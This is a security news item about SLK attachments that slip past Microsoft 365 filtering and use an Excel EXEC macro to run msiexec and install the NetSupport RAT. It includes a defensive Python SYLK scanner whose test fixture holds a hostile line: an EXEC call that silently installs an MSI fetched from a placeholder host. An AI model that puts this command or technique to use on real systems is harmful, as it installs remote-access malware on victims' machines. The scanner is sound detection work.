A new attack tactic has been spotted that bypasses both Microsoft 365 default security (Exchange Online Protection, EOP) and advanced security (Advanced Threat Protection, ATP).

What’s going on?
Avanan researchers reported a sharp increase in the use of SLK (symbolic link) files against Microsoft 365 users. The threat actors send an email with an SLK attachment that contains a malicious macro to download and install a remote access trojan (RAT).

Know your SLK file:
  • MS Office recognizes an SLK file as an Excel file.
  • SLK files link data between databases and spreadsheets.
  • Like .xls or .xlsx files, an SLK file is capable of executing malicious commands.

About the attack:
  • SLK files are rare, so receiving one most probably means you have been targeted. The attack was launched from thousands of Hotmail accounts.
  • The attack targets only Microsoft 365 accounts and, until recently, was confined to a few organizations.
  • Once the recipient enables content, the commands in the file are executed.
  • The SLK file uses the EEXEC Excel command, which shares data between different spreadsheets.
  • The final step is to run Windows Installer (msiexec) in quiet mode to install an MSI package. The payload was found to be the NetSupport Manager RAT.
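
A defender-side check for the attachment type described above, as an added example that is not Avanan's or Cyware's code: it parses the line-oriented SYLK records of an .slk file and flags cells whose formula calls EXEC or other command-capable Excel 4.0 functions, or that carry the msiexec command name. The function names, the flagged-function list and the two sample files are my own assumptions and constructions.

```python
import re

# Excel 4.0 macro functions that can launch programs or load native code;
# a spreadsheet exported from a database has no reason to carry them.
DANGEROUS_FUNCS = ("EXEC", "CALL", "REGISTER", "RUN", "FOPEN")
# Command name the article ties to this campaign's final step.
SUSPICIOUS_TOKENS = ("msiexec",)

def slk_findings(text: str) -> list:
    """Return one finding per suspicious SYLK cell record.

    SYLK is line oriented: 'ID;...' opens the file, 'C;...' records are
    cells, and a cell's formula is the field that begins with ';E'.  The raw
    record is kept so an analyst can see what Excel would have evaluated.
    """
    findings = []
    lines = text.splitlines()
    if not lines or not lines[0].startswith("ID;"):
        return findings  # not SYLK at all, so nothing to judge
    for lineno, line in enumerate(lines, 1):
        if not line.startswith("C;"):
            continue
        pos = line.find(";E")
        expr = line[pos + 2:] if pos != -1 else ""
        hit = next((f for f in DANGEROUS_FUNCS
                    if re.search(rf"\b{f}\s*\(", expr, re.IGNORECASE)), None)
        if hit is None:
            # Obfuscated samples split strings across cells, so also flag
            # plain cell values that carry the payload command name.
            hit = next((t for t in SUSPICIOUS_TOKENS if t in line.lower()), None)
        if hit is not None:
            findings.append({"line": lineno, "reason": hit, "record": line})
    return findings

def is_suspicious_slk(text: str) -> bool:
    return bool(slk_findings(text))

# Constructed samples (not from the campaign): a harmless export, and a
# file shaped like the one described, with a placeholder URL.
BENIGN_SLK = 'ID;PWXL;N;E\nC;Y1;X1;K"region"\nC;Y1;X2;K120\nC;Y2;X2;ESUM(R1C2:R1C2)\nE\n'
SUSPECT_SLK = ('ID;PWXL;N;E\n'
               'C;Y1;X1;EEXEC("msiexec /q /i http://PLACEHOLDER.invalid/p.msi")\n'
               'C;Y2;X1;EHALT()\n'
               'E\n')

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SLK), ("suspect", SUSPECT_SLK)):
        print(name, is_suspicious_slk(sample), slk_findings(sample))
```

Because every attachment in this campaign had a distinct MD5, a structural check like this catches variants that a hash blocklist misses.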

The bottom line is that the attack was highly obfuscated and designed to bypass a certain layer of the Microsoft 365 security infrastructure. Every file is unique, and no two attachments share the same MD5 hash. However, Gmail users are safe from this attack, as Google blocks it on incoming email.

Cyware Publisher